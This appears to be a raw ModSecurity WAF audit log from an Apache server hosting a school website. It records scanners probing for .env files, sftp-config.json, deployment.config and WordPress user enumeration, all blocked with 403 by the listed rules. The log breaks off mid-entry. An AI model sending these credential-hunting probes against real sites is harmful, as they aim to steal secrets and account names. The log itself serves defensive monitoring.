Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --928c7512-Z-- --3a694d4f-A-- [11/Jun/2025:23:33:50 +0700] aEmv7gI48YPcPeAOw9tVUAAAABg 103.236.140.4 46472 103.236.140.4 8181 --3a694d4f-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 Accept-Charset: utf-8 --3a694d4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a694d4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749659630518801 813 (- - -) Stopwatch2: 1749659630518801 813; combined=325, p1=284, p2=0, p3=0, p4=0, p5=40, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a694d4f-Z-- --44ec1529-A-- [11/Jun/2025:23:36:35 +0700] aEmwkwI48YPcPeAOw9tVWgAAABU 103.236.140.4 46506 103.236.140.4 8181 --44ec1529-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3542.0 Safari/537.36 Accept-Charset: utf-8 --44ec1529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44ec1529-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749659795254193 838 (- - -) Stopwatch2: 1749659795254193 838; combined=328, p1=287, p2=0, p3=0, p4=0, p5=41, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44ec1529-Z-- --0bde5b7c-A-- [11/Jun/2025:23:42:54 +0700] aEmyDtDFbATf6vJlOUt7mwAAAJc 103.236.140.4 46574 103.236.140.4 8181 --0bde5b7c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 Accept-Charset: utf-8 --0bde5b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bde5b7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749660174275830 828 (- - -) Stopwatch2: 1749660174275830 828; combined=333, p1=291, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bde5b7c-Z-- --110e091b-A-- [11/Jun/2025:23:44:51 +0700] aEmyg27bf2YTFvcEXPuLlQAAAEE 103.236.140.4 46596 103.236.140.4 8181 --110e091b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 Accept-Charset: utf-8 --110e091b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --110e091b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749660291551242 855 (- - -) Stopwatch2: 1749660291551242 855; combined=343, p1=300, p2=0, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --110e091b-Z-- --16923768-A-- [12/Jun/2025:00:14:31 +0700] aEm5d5P8TulJ-kfHNvEIDQAAANY 103.236.140.4 47022 103.236.140.4 8181 --16923768-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 176.65.137.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.65.137.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --16923768-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16923768-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749662071812970 836 (- - -) Stopwatch2: 1749662071812970 836; combined=338, p1=300, p2=0, p3=0, p4=0, p5=38, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16923768-Z-- --8fbd0e16-A-- [12/Jun/2025:00:14:58 +0700] aEm5kgI48YPcPeAOw9tVvwAAAA8 103.236.140.4 47038 103.236.140.4 8181 --8fbd0e16-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 176.65.137.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.65.137.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8fbd0e16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fbd0e16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749662098938813 882 (- - -) Stopwatch2: 1749662098938813 882; combined=334, p1=296, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fbd0e16-Z-- --7c6bd334-A-- [12/Jun/2025:00:26:18 +0700] aEm8OpP8TulJ-kfHNvEIPAAAAMU 103.236.140.4 49034 103.236.140.4 8181 --7c6bd334-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3879.0 Safari/537.36 Edg/78.0.249.0 Accept-Charset: utf-8 --7c6bd334-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c6bd334-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749662778599284 823 (- - -) Stopwatch2: 1749662778599284 823; combined=324, p1=286, p2=0, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c6bd334-Z-- --3dd90b61-A-- [12/Jun/2025:01:51:31 +0700] aEnQM5P8TulJ-kfHNvEKqQAAAMs 103.236.140.4 37084 103.236.140.4 8181 --3dd90b61-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; STK-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --3dd90b61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dd90b61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749667891174434 812 (- - -) Stopwatch2: 1749667891174434 812; combined=327, p1=287, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dd90b61-Z-- --e12c2679-A-- [12/Jun/2025:02:52:00 +0700] aEneYNDFbATf6vJlOUuEJgAAAIY 103.236.140.4 38506 103.236.140.4 8181 --e12c2679-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.248.148.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.248.148.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e12c2679-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e12c2679-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749671520339078 3171 (- - -) Stopwatch2: 1749671520339078 3171; combined=1388, p1=526, p2=832, p3=0, p4=0, p5=29, sr=133, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e12c2679-Z-- --2a7b4b53-A-- [12/Jun/2025:03:26:02 +0700] aEnmWsCW7vAFWQIjJpx0sgAAAFU 103.236.140.4 39032 103.236.140.4 8181 --2a7b4b53-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0 Accept-Charset: utf-8 --2a7b4b53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a7b4b53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749673562366706 894 (- - -) Stopwatch2: 1749673562366706 894; combined=313, p1=278, p2=0, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a7b4b53-Z-- --18406b52-A-- [12/Jun/2025:03:26:18 +0700] aEnmaviOwnjCOc5ARoVWEQAAAAk 103.236.140.4 39038 103.236.140.4 8181 --18406b52-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; MI 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --18406b52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18406b52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749673578787230 1291 (- - -) Stopwatch2: 1749673578787230 1291; combined=534, p1=494, p2=0, p3=0, p4=0, p5=40, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18406b52-Z-- --8a76da77-A-- [12/Jun/2025:04:03:36 +0700] aEnvKKF10OasdbQdujgsGAAAAM4 103.236.140.4 39384 103.236.140.4 8181 --8a76da77-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.115.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.115.46 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 Accept-Charset: utf-8 --8a76da77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a76da77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749675816672488 878 (- - -) Stopwatch2: 1749675816672488 878; combined=384, p1=354, p2=0, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a76da77-Z-- --29d6da26-A-- [12/Jun/2025:04:35:18 +0700] aEn2lqF10OasdbQdujgzEgAAAMU 103.236.140.4 33098 103.236.140.4 8181 --29d6da26-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.87.154 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.87.154 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --29d6da26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29d6da26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749677718571020 852 (- - -) Stopwatch2: 1749677718571020 852; combined=346, p1=307, p2=0, p3=0, p4=0, p5=39, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29d6da26-Z-- --6293a004-A-- [12/Jun/2025:04:51:12 +0700] aEn6UKF10OasdbQdujgzLAAAANg 103.236.140.4 33256 103.236.140.4 8181 --6293a004-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.189.137.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.189.137.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6293a004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6293a004-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749678672859163 3174 (- - -) Stopwatch2: 1749678672859163 3174; combined=1355, p1=489, p2=836, p3=0, p4=0, p5=29, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6293a004-Z-- --81258550-A-- [12/Jun/2025:04:51:44 +0700] aEn6cMCW7vAFWQIjJpx7CwAAAFM 103.236.140.4 33262 103.236.140.4 8181 --81258550-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.184.174.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.184.174.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --81258550-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81258550-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749678704468390 3223 (- - -) Stopwatch2: 1749678704468390 3223; combined=1363, p1=431, p2=895, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81258550-Z-- --fda57e2d-A-- [12/Jun/2025:05:17:56 +0700] aEoAlGDP2O-J0msTyvUvegAAAI0 103.236.140.4 56508 103.236.140.4 8181 --fda57e2d-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.184.80.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.184.80.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 Accept: */* --fda57e2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fda57e2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749680276863817 830 (- - -) Stopwatch2: 1749680276863817 830; combined=305, p1=268, p2=0, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fda57e2d-Z-- --7b7bc736-A-- [12/Jun/2025:05:18:07 +0700] aEoAn6F10OasdbQdujhQXgAAAM8 103.236.140.4 56946 103.236.140.4 8181 --7b7bc736-B-- GET /deployment.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.184.80.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.184.80.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 Accept: */* --7b7bc736-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b7bc736-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749680287661832 2057 (- - -) Stopwatch2: 1749680287661832 2057; combined=723, p1=324, p2=377, p3=0, p4=0, p5=22, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b7bc736-Z-- --e6e9ae03-A-- [12/Jun/2025:05:18:07 +0700] aEoAn6F10OasdbQdujhQYgAAANQ 103.236.140.4 56956 103.236.140.4 8181 --e6e9ae03-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.184.80.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.184.80.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 Accept: */* --e6e9ae03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6e9ae03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749680287837569 722 (- - -) Stopwatch2: 1749680287837569 722; combined=301, p1=268, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6e9ae03-Z-- --86bed649-A-- [12/Jun/2025:05:27:40 +0700] aEoC3PiOwnjCOc5ARoV9WwAAAAI 103.236.140.4 50294 103.236.140.4 8181 --86bed649-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 191.241.232.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 191.241.232.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --86bed649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86bed649-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749680860433719 2962 (- - -) Stopwatch2: 1749680860433719 2962; combined=1716, p1=605, 